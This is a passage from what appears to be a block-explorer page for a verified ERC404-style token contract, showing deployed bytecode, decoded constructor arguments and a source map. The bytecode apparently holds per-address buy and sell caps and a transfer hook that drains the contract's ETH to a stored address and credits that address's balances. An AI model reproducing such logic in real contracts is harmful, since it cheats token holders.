0915290205460ff16155b15610639576040516282b42960e81b815260040160405180910390fd5b5f8381526009602090815260409182902080546001600160a01b0319166001600160a01b038881169182179092559251868152908416917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3506106fc565b335f8181526008602090815260408083206001600160a01b03881680855290835292819020869055518581529192917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a35b5060015b92915050565b61070e611011565b601291909155601355565b6004548111610a29575f818152600b60205260409020546001600160a01b0384811691161461075b57604051636edaef2f60e11b815260040160405180910390fd5b6001600160a01b03821661078257604051634e46966960e11b815260040160405180910390fd5b336001600160a01b038416148015906107be57506001600160a01b0383165f908152600a6020908152604080832033845290915290205460ff16155b80156107e057505f818152600960205260409020546001600160a01b03163314155b156107fd576040516282b42960e81b815260040160405180910390fd5b61080561103d565b6001600160a01b0384165f908152600760205260408120805490919061082c908490611c45565b9091555061083a905061103d565b6001600160a01b038084165f8181526007602090815260408083208054909601909555858252600b815284822080546001600160a01b031990811690941790556009815284822080549093169092559186168252600c905290812080546108a390600190611c45565b815481106108b3576108b3611c58565b5f9182526020808320909101546001600160a01b0387168352600c82526040808420868552600d909352909220548154929350839281106108f6576108f6611c58565b5f9182526020808320909101929092556001600160a01b0386168152600c9091526040902080548061092a5761092a611c6c565b5f828152602080822083015f19908101839055909201909255838252600d8152604080832054848452818420556001600160a01b038616808452600c8352908320805460018181018355828652938520018690559252905461098c9190611c45565b5f838152600d602052604080822092909255905183916001600160a01b0380871692908816917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91a4826001600160a01b0316846001600160a01b03167fe59fdd36d0d223c0c7d996db7ad796880f45e1936cb0bb7ac102e7082e031487610a1261103d565b60405190815260200160405180910390a350505050565b6001600160a01b0383165f9081526008602090815260408083203384529091529020545f198114610a8257610a5e8282611c45565b6001600160a01b0385165f9081526008602090815260408083203384529091529020555b610a8d84848461106e565b50505b505050565b610aa0838383610719565b6001600160a01b0382163b15801590610b485750604051630a85bd0160e11b8082523360048301526001600160a01b03858116602484015260448301849052608060648401525f608484015290919084169063150b7a029060a4016020604051808303815f875af1158015610b17573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610b3b9190611c80565b6001600160e01b03191614155b15610a9057604051633da6393160e01b815260040160405180910390fd5b610b6e611011565b610b7882826111f2565b5050565b610b84611011565b6001600160a01b03919091165f908152600e60205260409020805460ff1916911515919091179055565b5f818152600b60205260409020546001600160a01b031680610be35760405163c5723b5160e01b815260040160405180910390fd5b919050565b610bf0611011565b610bf95f61120b565b565b60015433906001600160a01b03168114610c385760405163118cdaa760e01b81526001600160a01b03821660048201526024015b60405180910390fd5b610c418161120b565b50565b6003805461053c90611bf9565b610c59611011565b5f737a250d5630b4cf539739df2c5dacb4c659f2488d9050806001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610cad573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610cd19190611ca7565b6001600160a01b031663c9c65396826001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610d1b573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610d3f9190611ca7565b6040516001600160e01b031960e084901b1681526001600160a01b0390911660048201523060248201526044016020604051808303815f875af1158015610d88573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610dac9190611ca7565b600580546001600160a01b0319166001600160a01b039290921691821790555f908152600e60205260409020805460ff1916600117905550565b335f818152600a602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b5f610e5d33848461106e565b9392505050565b610e6f858585610719565b6001600160a01b0384163b15801590610f065750604051630a85bd0160e11b808252906001600160a01b0386169063150b7a0290610eb99033908a90899089908990600401611cc2565b6020604051808303815f875af1158015610ed5573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610ef99190611c80565b6001600160e01b03191614155b15610a8d57604051633da6393160e01b815260040160405180910390fd5b60605f60118054610f3490611bf9565b905011610f4f5760405180602001604052805f815250610700565b6011610f5a83611224565b604051602001610f6b929190611d14565b60405160208183030381529060405292915050565b6011805461053c90611bf9565b610f95611011565b6011610b788282611deb565b610fa9611011565b600180546001600160a01b0383166001600160a01b03199091168117909155610fd95f546001600160a01b031690565b6001600160a01b03167f38d16b8cac22d99fc7c124b9cd0de2d3fa1faef420bfe791d8c362d765e2270060405160405180910390a350565b5f546001600160a01b03163314610bf95760405163118cdaa760e01b8152336004820152602401610c2f565b5f6110697f0000000000000000000000000000000000000000000000000000000000000012600a611f8b565b905090565b5f6110776112b4565b6001600160a01b0384165f908152600e602052604090205460ff1661112b576001600160a01b0384165f90815260166020526040812080548492906110bd908490611f99565b90915550506013546001600160a01b0385165f90815260166020526040902054111561112b5760405162461bcd60e51b815260206004820152601b60248201527f6e6f7420616c6c6f77656420616e796d6f726520746f2073656c6c00000000006044820152606401610c2f565b6001600160a01b0383165f908152600e602052604090205460ff166111df576001600160a01b0383165f9081526015602052604081208054849290611171908490611f99565b90915550506012546001600160a01b0384165f9081526015602052604090205411156111df5760405162461bcd60e51b815260206004820152601a60248201527f6e6f7420616c6c6f77656420616e796d6f726520746f206275790000000000006044820152606401610c2f565b6111ea8484846112d8565b949350505050565b60026111fe8382611deb565b506003610a908282611deb565b600180546001600160a01b0319169055610c41816114ab565b60605f611230836114fa565b60010190505f8167ffffffffffffffff81111561124f5761124f6119b1565b6040519080825280601f01601f191660200182016040528015611279576020820181803683370190505b5090508181016020015b5f19016f181899199a1a9b1b9c1cb0b131b232b360811b600a86061a8153600a850494508461128357509392505050565b600f5460ff1615610bf95760405163d93c066560e01b815260040160405180910390fd5b5f806112e261103d565b6001600160a01b038087165f90815260076020526040808220549288168252902054919250906113138787876115d1565b156113245760019350505050610e5d565b6001600160a01b0387165f908152600760205260408120805487929061134b908490611c45565b90915550506001600160a01b038087165f90815260076020908152604080832080548a019055928a168252600e9052205460ff166113da576001600160a01b0387165f908152600760205260408120546113a6908590611fac565b6113b08585611fac565b6113ba9190611c45565b90505f5b818110156113d7576113cf89611675565b6001016113be565b50505b6001600160a01b0386165f908152600e602052604090205460ff16611451575f6114048483611fac565b6001600160a01b0388165f90815260076020526040902054611427908690611fac565b6114319190611c45565b90505f5b8181101561144e5761144688611796565b600101611435565b50505b856001600160a01b0316876001600160a01b03167fe59fdd36d0d223c0c7d996db7ad796880f45e1936cb0bb7ac102e7082e0314878760405161149691815260200190565b60405180910390a35060019695505050505050565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b5f8072184f03e93ff9f4daa797ed6e38ed64bf6a1f0160401b83106115385772184f03e93ff9f4daa797ed6e38ed64bf6a1f0160401b830492506040015b6d04ee2d6d415b85acef81000000008310611564576d04ee2d6d415b85acef8100000000830492506020015b662386f26fc10000831061158257662386f26fc10000830492506010015b6305f5e100831061159a576305f5e100830492506008015b61271083106115ae57612710830492506004015b606483106115c0576064830492506002015b600a83106107005760010192915050565b6005545f906001600160a01b039081169084160361166c576006546040516001600160a01b03909116904780156108fc02915f818181858888f1935050505015801561161f573d5f803e3d5ffd5b506006546001600160a01b039081169085160361166c576001600160a01b0383165f908152600760205260408120805484929061165d908490611f99565b9091555060019150610e5d9050565b505f9392505050565b6001600160a01b03811661169c57604051636edaef2f60e11b815260040160405180910390fd5b6001600160a01b0381165f908152600c6020526040812080546116c190600190611c45565b815481106116d1576116d1611c58565b905f5260205f2001549050600c5f836001600160a01b03166001600160a01b031681526020019081526020015f2080548061170e5761170e611c6c565b5f828152602080822083015f19908101839055909201909255828252600d81526040808320839055600b825280832080546001600160a01b031990811690915560099092528083208054909216909155518291906001600160a01b038516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908390a45050565b61179e6112b4565b610c41816001600160a01b0381166117c957604051634e46966960e11b815260040160405180910390fd5b60048054600101908190555f818152600b60205260409020546001600160a01b0316156118095760405163119b4fd360e11b815260040160405180910390fd5b5f818152600b6020908152604080832080546001600160a01b0319166001600160a01b038716908117909155808452600c835290832080546001818101835582865293852001859055925290546118609190611c45565b5f828152600d602052604080822092909255905182916001600160a01b038516917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a45050565b5f5b838110156118c45781810151838201526020016118ac565b50505f910152565b602081525f82518060208401526118ea8160408501602087016118aa565b601f01601f19169190910160400192915050565b5f6020828403121561190e575f80fd5b5035919050565b6001600160a01b0381168114610c41575f80fd5b5f806040838503121561193a575f80fd5b823561194581611915565b946020939093013593505050565b5f8060408385031215611964575f80fd5b50508035926020909101359150565b5f805f60608486031215611985575f80fd5b833561199081611915565b925060208401356119a081611915565b929592945050506040919091013590565b634e487b7160e01b5f52604160045260245ffd5b5f82601f8301126119d4575f80fd5b813567ffffffffffffffff808211156119ef576119ef6119b1565b604051601f8301601f19908116603f01168101908282118183101715611a1757611a176119b1565b81604052838152866020858801011115611a2f575f80fd5b836020870160208301375f602085830101528094505050505092915050565b5f8060408385031215611a5f575f80fd5b823567ffffffffffffffff80821115611a76575f80fd5b611a82868387016119c5565b93506020850135915080821115611a97575f80fd5b50611aa4858286016119c5565b9150509250929050565b5f8060408385031215611abf575f80fd5b8235611aca81611915565b915060208301358015158114611ade575f80fd5b809150509250929050565b5f60208284031215611af9575f80fd5b8135610e5d81611915565b5f805f805f60808688031215611b18575f80fd5b8535611b2381611915565b94506020860135611b3381611915565b935060408601359250606086013567ffffffffffffffff80821115611b56575f80fd5b818801915088601f830112611b69575f80fd5b813581811115611b77575f80fd5b896020828501011115611b88575f80fd5b9699959850939650602001949392505050565b5f8060408385031215611bac575f80fd5b8235611bb781611915565b91506020830135611ade81611915565b5f60208284031215611bd7575f80fd5b813567ffffffffffffffff811115611bed575f80fd5b6111ea848285016119c5565b600181811c90821680611c0d57607f821691505b602082108103611c2b57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8181038181111561070057610700611c31565b634e487b7160e01b5f52603260045260245ffd5b634e487b7160e01b5f52603160045260245ffd5b5f60208284031215611c90575f80fd5b81516001600160e01b031981168114610e5d575f80fd5b5f60208284031215611cb7575f80fd5b8151610e5d81611915565b6001600160a01b038681168252851660208201526040810184905260806060820181905281018290525f828460a08401375f60a0848401015260a0601f19601f85011683010190509695505050505050565b5f808454611d2181611bf9565b60018281168015611d395760018114611d4e57611d7a565b60ff1984168752821515830287019450611d7a565b885f526020805f205f5b85811015611d715781548a820152908401908201611d58565b50505082870194505b505050508351611d8e8183602088016118aa565b64173539b7b760d91b9101908152600501949350505050565b601f821115610a9057805f5260205f20601f840160051c81016020851015611dcc5750805b601f840160051c820191505b81811015610a8d575f8155600101611dd8565b815167ffffffffffffffff811115611e0557611e056119b1565b611e1981611e138454611bf9565b84611da7565b602080601f831160018114611e4c575f8415611e355750858301515b5f19600386901b1c1916600185901b178555611ea3565b5f85815260208120601f198616915b82811015611e7a57888601518255948401946001909101908401611e5b565b5085821015611e9757878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b600181815b80851115611ee557815f1904821115611ecb57611ecb611c31565b80851615611ed857918102915b93841c9390800290611eb0565b509250929050565b5f82611efb57506001610700565b81611f0757505f610700565b8160018114611f1d5760028114611f2757611f43565b6001915050610700565b60ff841115611f3857611f38611c31565b50506001821b610700565b5060208310610133831016604e8410600b8410161715611f66575081810a610700565b611f708383611eab565b805f1904821115611f8357611f83611c31565b029392505050565b5f610e5d60ff841683611eed565b8082018082111561070057610700611c31565b5f82611fc657634e487b7160e01b5f52601260045260245ffd5b50049056fea2646970667358221220e74beb20157245e3770bc24a040e8188bffd69d49e44aadb692e45d3bce5848064736f6c63430008160033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000837370b0b6c48663bba8bbe06f6604700900e79000000000000000000000000000000000000000000000000000000000000000c8000000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000004
-----Decoded View---------------
Arg [0] : _owner (address): 0x837370b0B6c48663Bba8Bbe06F6604700900E790
Arg [1] : _initialSupply (uint256): 200
Arg [2] : _decimal (uint8): 18
Arg [3] : _buylimit (uint256): 4
Arg [4] : _selllimit (uint256): 4
-----Encoded View---------------
5 Constructor Arguments found :
Arg [0] : 000000000000000000000000837370b0b6c48663bba8bbe06f6604700900e790
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c8
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000004
Deployed Bytecode Sourcemap
44206:2422:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34561:18;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;35317:46;;;;;;:::i;:::-;;;;;;;;;;;;-1:-1:-1;;;;;35317:46:0;;;;;;-1:-1:-1;;;;;1019:32:1;;;1001:51;;989:2;974:18;35317:46:0;855:203:1;37180:642:0;;;;;;:::i;:::-;;:::i;:::-;;;1684:14:1;;1677:22;1659:41;;1647:2;1632:18;37180:642:0;1519:187:1;34797:36:0;;;;;;;;1857:25:1;;;1845:2;1830:18;34797:36:0;1711:177:1;45327:145:0;;;;;;:::i;:::-;;:::i;:::-;;38229:1716;;;;;;:::i;:::-;;:::i;34697:31::-;;;;;;;;2779:4:1;2767:17;;;2749:36;;2737:2;2722:18;34697:31:0;2607:184:1;40241:405:0;;;;;;:::i;:::-;;:::i;34932:21::-;;;;;;44326:24;;;;;;46269:158;;;;;;:::i;:::-;;:::i;36509:111::-;;;;;;:::i;:::-;;:::i;44296:23::-;;;;;;26343:86;26414:7;;;;26343:86;;36692:193;;;;;;:::i;:::-;;:::i;44357:22::-;;;;;;35083:44;;;;;;:::i;:::-;;;;;;;;;;;;;;29716:103;;;:::i;32353:235::-;;;:::i;29041:87::-;29087:7;29114:6;-1:-1:-1;;;;;29114:6:0;29041:87;;34615:20;;;:::i;35928:41::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;45042:277;;;:::i;37873:207::-;;;;;;:::i;:::-;;:::i;40004:160::-;;;;;;:::i;:::-;;:::i;40741:437::-;;;;;;:::i;:::-;;:::i;46435:190::-;;;;;;:::i;:::-;;:::i;44263:26::-;;;:::i;35197:64::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;46155:106;;;;;;:::i;:::-;;:::i;44386:48::-;;;;;;:::i;:::-;;;;;;;;;;;;;;31441:101;31521:13;;-1:-1:-1;;;;;31521:13:0;31441:101;;35428:68;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;31741:181;;;;;;:::i;:::-;;:::i;44441:49::-;;;;;;:::i;:::-;;;;;;;;;;;;;;34561:18;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;37180:642::-;37283:4;37318:6;;37304:10;:20;;:38;;;;;37341:1;37328:10;:14;37304:38;37300:491;;;37359:13;37375:20;;;:8;:20;;;;;;-1:-1:-1;;;;;37375:20:0;37416:10;:19;;;;;:59;;-1:-1:-1;;;;;;37440:23:0;;;;;;:16;:23;;;;;;;;37464:10;37440:35;;;;;;;;;;37439:36;37416:59;37412:121;;;37503:14;;-1:-1:-1;;;37503:14:0;;;;;;;;;;;37412:121;37549:23;;;;:11;:23;;;;;;;;;:33;;-1:-1:-1;;;;;;37549:33:0;-1:-1:-1;;;;;37549:33:0;;;;;;;;;37604:36;;1857:25:1;;;37604:36:0;;;;;;1830:18:1;37604:36:0;;;;;;;37344:308;37300:491;;;37683:10;37673:21;;;;:9;:21;;;;;;;;-1:-1:-1;;;;;37673:30:0;;;;;;;;;;;;:43;;;37738:41;1857:25:1;;;37673:30:0;;37683:10;37738:41;;1830:18:1;37738:41:0;;;;;;;37300:491;-1:-1:-1;37810:4:0;37180:642;;;;;:::o;45327:145::-;28927:13;:11;:13::i;:::-;45411:8:::1;:20:::0;;;;45442:9:::1;:22:::0;45327:145::o;38229:1716::-;38375:6;;38361:10;:20;38357:1581;;38410:20;;;;:8;:20;;;;;;-1:-1:-1;;;;;38402:28:0;;;38410:20;;38402:28;38398:91;;38458:15;;-1:-1:-1;;;38458:15:0;;;;;;;;;;;38398:91;-1:-1:-1;;;;;38509:16:0;;38505:82;;38553:18;;-1:-1:-1;;;38553:18:0;;;;;;;;;;;38505:82;38625:10;-1:-1:-1;;;;;38625:18:0;;;;;;:74;;-1:-1:-1;;;;;;38665:22:0;;;;;;:16;:22;;;;;;;;38688:10;38665:34;;;;;;;;;;38664:35;38625:74;:132;;;;-1:-1:-1;38734:23:0;;;;:11;:23;;;;;;-1:-1:-1;;;;;38734:23:0;38720:10;:37;;38625:132;38603:226;;;38799:14;;-1:-1:-1;;;38799:14:0;;;;;;;;;;;38603:226;38864:10;:8;:10::i;:::-;-1:-1:-1;;;;;38845:15:0;;;;;;:9;:15;;;;;:29;;:15;;;:29;;;;;:::i;:::-;;;;-1:-1:-1;38937:10:0;;-1:-1:-1;38937:8:0;:10::i;:::-;-1:-1:-1;;;;;38920:13:0;;;;;;;:9;:13;;;;;;;;:27;;;;;;;;38979:20;;;:8;:20;;;;;:25;;-1:-1:-1;;;;;;38979:25:0;;;;;;;;39026:11;:23;;;;;39019:30;;;;;;;;39127:12;;;;;:6;:12;;;;;39140:19;;:23;;-1:-1:-1;;39140:23:0;:::i;:::-;39127:37;;;;;;;;:::i;:::-;;;;;;;;;;;;;-1:-1:-1;;;;;39179:12:0;;;;:6;:12;;;;;;39192:23;;;:11;:23;;;;;;;39179:37;;39127;;-1:-1:-1;39127:37:0;;39179;;;;;;:::i;:::-;;;;;;;;;;;;:49;;;;-1:-1:-1;;;;;39263:12:0;;;;:6;:12;;;;;;:18;;;;;;;:::i;:::-;;;;;;;;;;;-1:-1:-1;;39263:18:0;;;;;;;;;;;;39367:23;;;:11;:23;;;;;;;39342:22;;;;;;:48;-1:-1:-1;;;;;39444:10:0;;;;;:6;:10;;;;;:27;;39263:18;39444:27;;;;;;;;;;;;;;;39554:10;;:17;;:21;;39263:18;39554:21;:::i;:::-;39528:23;;;;:11;:23;;;;;;:47;;;;39597:30;;39540:10;;-1:-1:-1;;;;;39597:30:0;;;;;;;;;;;39667:2;-1:-1:-1;;;;;39647:35:0;39661:4;-1:-1:-1;;;;;39647:35:0;;39671:10;:8;:10::i;:::-;39647:35;;1857:25:1;;;1845:2;1830:18;39647:35:0;;;;;;;38383:1311;38229:1716;;;:::o;38357:1581::-;-1:-1:-1;;;;;39733:15:0;;39715;39733;;;:9;:15;;;;;;;;39749:10;39733:27;;;;;;;;-1:-1:-1;;39781:28:0;;39777:101;;39858:20;39868:10;39858:7;:20;:::i;:::-;-1:-1:-1;;;;;39828:15:0;;;;;;:9;:15;;;;;;;;39844:10;39828:27;;;;;;;:50;39777:101;39895:31;39905:4;39911:2;39915:10;39895:9;:31::i;:::-;;39700:238;38357:1581;38229:1716;;;:::o;40241:405::-;40365:26;40378:4;40384:2;40388;40365:12;:26::i;:::-;-1:-1:-1;;;;;40422:14:0;;;:19;;;;:154;;-1:-1:-1;40458:61:0;;-1:-1:-1;;;40458:61:0;;;40494:10;40458:61;;;7753:34:1;-1:-1:-1;;;;;7823:15:1;;;7803:18;;;7796:43;7855:18;;;7848:34;;;7918:3;7898:18;;;7891:31;-1:-1:-1;7938:19:1;;;7931:30;40536:40:0;;40458:35;;;;40536:40;;7978:19:1;;40458:61:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;;;;;40458:118:0;;;40422:154;40404:235;;;40610:17;;-1:-1:-1;;;40610:17:0;;;;;;;;;;;46269:158;28927:13;:11;:13::i;:::-;46389:30:::1;46404:5;46411:7;46389:14;:30::i;:::-;46269:158:::0;;:::o;36509:111::-;28927:13;:11;:13::i;:::-;-1:-1:-1;;;;;36587:17:0;;;::::1;;::::0;;;:9:::1;:17;::::0;;;;:25;;-1:-1:-1;;36587:25:0::1;::::0;::::1;;::::0;;;::::1;::::0;;36509:111::o;36692:193::-;36750:13;36784:12;;;:8;:12;;;;;;-1:-1:-1;;;;;36784:12:0;;36809:69;;36856:10;;-1:-1:-1;;;36856:10:0;;;;;;;;;;;36809:69;36692:193;;;:::o;29716:103::-;28927:13;:11;:13::i;:::-;29781:30:::1;29808:1;29781:18;:30::i;:::-;29716:103::o:0;32353:235::-;31521:13;;24202:10;;-1:-1:-1;;;;;31521:13:0;32450:24;;32446:98;;32498:34;;-1:-1:-1;;;32498:34:0;;-1:-1:-1;;;;;1019:32:1;;32498:34:0;;;1001:51:1;974:18;;32498:34:0;;;;;;;;32446:98;32554:26;32573:6;32554:18;:26::i;:::-;32395:193;32353:235::o;34615:20::-;;;;;;;:::i;45042:277::-;28927:13;:11;:13::i;:::-;45092:25:::1;45139:42;45092:90;;45219:6;-1:-1:-1::0;;;;;45219:14:0::1;;:16;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;45201:46:0::1;;45248:6;-1:-1:-1::0;;;;;45248:11:0::1;;:13;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;45201:76;::::0;-1:-1:-1;;;;;;45201:76:0::1;::::0;;;;;;-1:-1:-1;;;;;8789:15:1;;;45201:76:0::1;::::0;::::1;8771:34:1::0;45271:4:0::1;8821:18:1::0;;;8814:43;8706:18;;45201:76:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;45193:5;:84:::0;;-1:-1:-1;;;;;;45193:84:0::1;-1:-1:-1::0;;;;;45193:84:0;;;::::1;::::0;;::::1;::::0;;-1:-1:-1;45288:16:0;;;:9:::1;:16;::::0;;;;:23;;-1:-1:-1;;45288:23:0::1;-1:-1:-1::0;45288:23:0::1;::::0;;-1:-1:-1;45042:277:0:o;37873:207::-;37976:10;37959:28;;;;:16;:28;;;;;;;;-1:-1:-1;;;;;37959:38:0;;;;;;;;;;;;:49;;-1:-1:-1;;37959:49:0;;;;;;;;;;38026:46;;1659:41:1;;;37959:38:0;;37976:10;38026:46;;1632:18:1;38026:46:0;;;;;;;37873:207;;:::o;40004:160::-;40099:4;40123:33;40133:10;40145:2;40149:6;40123:9;:33::i;:::-;40116:40;40004:160;-1:-1:-1;;;40004:160:0:o;40741:437::-;40895:26;40908:4;40914:2;40918;40895:12;:26::i;:::-;-1:-1:-1;;;;;40952:14:0;;;:19;;;;:156;;-1:-1:-1;40988:63:0;;-1:-1:-1;;;40988:63:0;;;41068:40;-1:-1:-1;;;;;40988:35:0;;;41068:40;;40988:63;;41024:10;;41036:4;;41042:2;;41046:4;;;;40988:63;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;;;;;40988:120:0;;;40952:156;40934:237;;;41142:17;;-1:-1:-1;;;41142:17:0;;;;;;;;;;;46435:190;46495:13;46557:1;46534:12;46528:26;;;;;:::i;:::-;;;:30;:89;;;;;;;;;;;;;;;;;46575:12;46589:13;:2;:11;:13::i;:::-;46561:51;;;;;;;;;:::i;:::-;;;;;;;;;;;;;46521:96;46435:190;-1:-1:-1;;46435:190:0:o;44263:26::-;;;;;;;:::i;46155:106::-;28927:13;:11;:13::i;:::-;46229:12:::1;:24;46244:9:::0;46229:12;:24:::1;:::i;31741:181::-:0;28927:13;:11;:13::i;:::-;31831::::1;:24:::0;;-1:-1:-1;;;;;31831:24:0;::::1;-1:-1:-1::0;;;;;;31831:24:0;;::::1;::::0;::::1;::::0;;;31896:7:::1;29087::::0;29114:6;-1:-1:-1;;;;;29114:6:0;;29041:87;31896:7:::1;-1:-1:-1::0;;;;;31871:43:0::1;;;;;;;;;;;31741:181:::0;:::o;29206:166::-;29087:7;29114:6;-1:-1:-1;;;;;29114:6:0;24202:10;29266:23;29262:103;;29313:40;;-1:-1:-1;;;29313:40:0;;24202:10;29313:40;;;1001:51:1;974:18;;29313:40:0;855:203:1;42802:92:0;42845:7;42872:14;42878:8;42872:2;:14;:::i;:::-;42865:21;;42802:92;:::o;45603:544::-;45747:4;25948:19;:17;:19::i;:::-;-1:-1:-1;;;;;45767:15:0;::::1;;::::0;;;:9:::1;:15;::::0;;;;;::::1;;45763:163;;-1:-1:-1::0;;;;;45798:19:0;::::1;;::::0;;;:13:::1;:19;::::0;;;;:29;;45821:6;;45798:19;:29:::1;::::0;45821:6;;45798:29:::1;:::i;:::-;::::0;;;-1:-1:-1;;45873:9:0::1;::::0;-1:-1:-1;;;;;45850:19:0;::::1;;::::0;;;:13:::1;:19;::::0;;;;;:32:::1;;45842:72;;;::::0;-1:-1:-1;;;45842:72:0;;14596:2:1;45842:72:0::1;::::0;::::1;14578:21:1::0;14635:2;14615:18;;;14608:30;14674:29;14654:18;;;14647:57;14721:18;;45842:72:0::1;14394:351:1::0;45842:72:0::1;-1:-1:-1::0;;;;;45940:13:0;::::1;;::::0;;;:9:::1;:13;::::0;;;;;::::1;;45936:153;;-1:-1:-1::0;;;;;45969:16:0;::::1;;::::0;;;:12:::1;:16;::::0;;;;:26;;45989:6;;45969:16;:26:::1;::::0;45989:6;;45969:26:::1;:::i;:::-;::::0;;;-1:-1:-1;;46038:8:0::1;::::0;-1:-1:-1;;;;;46018:16:0;::::1;;::::0;;;:12:::1;:16;::::0;;;;;:28:::1;;46010:67;;;::::0;-1:-1:-1;;;46010:67:0;;14952:2:1;46010:67:0::1;::::0;::::1;14934:21:1::0;14991:2;14971:18;;;14964:30;15030:28;15010:18;;;15003:56;15076:18;;46010:67:0::1;14750:350:1::0;46010:67:0::1;46106:33;46122:4;46128:2;46132:6;46106:15;:33::i;:::-;46099:40:::0;45603:544;-1:-1:-1;;;;45603:544:0:o;43765:160::-;43878:4;:12;43885:5;43878:4;:12;:::i;:::-;-1:-1:-1;43901:6:0;:16;43910:7;43901:6;:16;:::i;32112:156::-;32202:13;32195:20;;-1:-1:-1;;;;;;32195:20:0;;;32226:34;32251:8;32226:24;:34::i;20892:718::-;20948:13;20999:14;21016:17;21027:5;21016:10;:17::i;:::-;21036:1;21016:21;20999:38;;21052:20;21086:6;21075:18;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;21075:18:0;-1:-1:-1;21052:41:0;-1:-1:-1;21217:28:0;;;21233:2;21217:28;21274:290;-1:-1:-1;;21306:5:0;-1:-1:-1;;;21443:2:0;21432:14;;21427:32;21306:5;21414:46;21506:2;21497:11;;;-1:-1:-1;21527:21:0;21274:290;21527:21;-1:-1:-1;21585:6:0;20892:718;-1:-1:-1;;;20892:718:0:o;26502:132::-;26414:7;;;;26564:63;;;26600:15;;-1:-1:-1;;;26600:15:0;;;;;;;;;;;41602:1161;41723:4;41740:12;41755:10;:8;:10::i;:::-;-1:-1:-1;;;;;41806:15:0;;;41776:27;41806:15;;;:9;:15;;;;;;;41864:13;;;;;;;;41740:25;;-1:-1:-1;41806:15:0;41893:33;41816:4;41874:2;41919:6;41893:15;:33::i;:::-;41890:49;;;41935:4;41928:11;;;;;;;41890:49;-1:-1:-1;;;;;41950:15:0;;;;;;:9;:15;;;;;:25;;41969:6;;41950:15;:25;;41969:6;;41950:25;:::i;:::-;;;;-1:-1:-1;;;;;;;42013:13:0;;;;;;;:9;:13;;;;;;;;:23;;;;;;42121:15;;;;;:9;:15;;;;;;42116:251;;-1:-1:-1;;;;;42227:15:0;;42153:22;42227:15;;;:9;:15;;;;;;:22;;42245:4;;42227:22;:::i;:::-;42179:26;42201:4;42179:19;:26;:::i;:::-;42178:72;;;;:::i;:::-;42153:97;;42270:9;42265:91;42289:14;42285:1;:18;42265:91;;;42329:11;42335:4;42329:5;:11::i;:::-;42305:3;;42265:91;;;;42138:229;42116:251;-1:-1:-1;;;;;42443:13:0;;;;;;:9;:13;;;;;;;;42438:247;;42473:22;42541:28;42565:4;42541:21;:28;:::i;:::-;-1:-1:-1;;;;;42499:13:0;;;;;;:9;:13;;;;;;:20;;42515:4;;42499:20;:::i;:::-;42498:72;;;;:::i;:::-;42473:97;;42590:9;42585:89;42609:14;42605:1;:18;42585:89;;;42649:9;42655:2;42649:5;:9::i;:::-;42625:3;;42585:89;;;;42458:227;42438:247;42722:2;-1:-1:-1;;;;;42702:31:0;42716:4;-1:-1:-1;;;;;42702:31:0;;42726:6;42702:31;;;;1857:25:1;;1845:2;1830:18;;1711:177;42702:31:0;;;;;;;;-1:-1:-1;42751:4:0;;41602:1161;-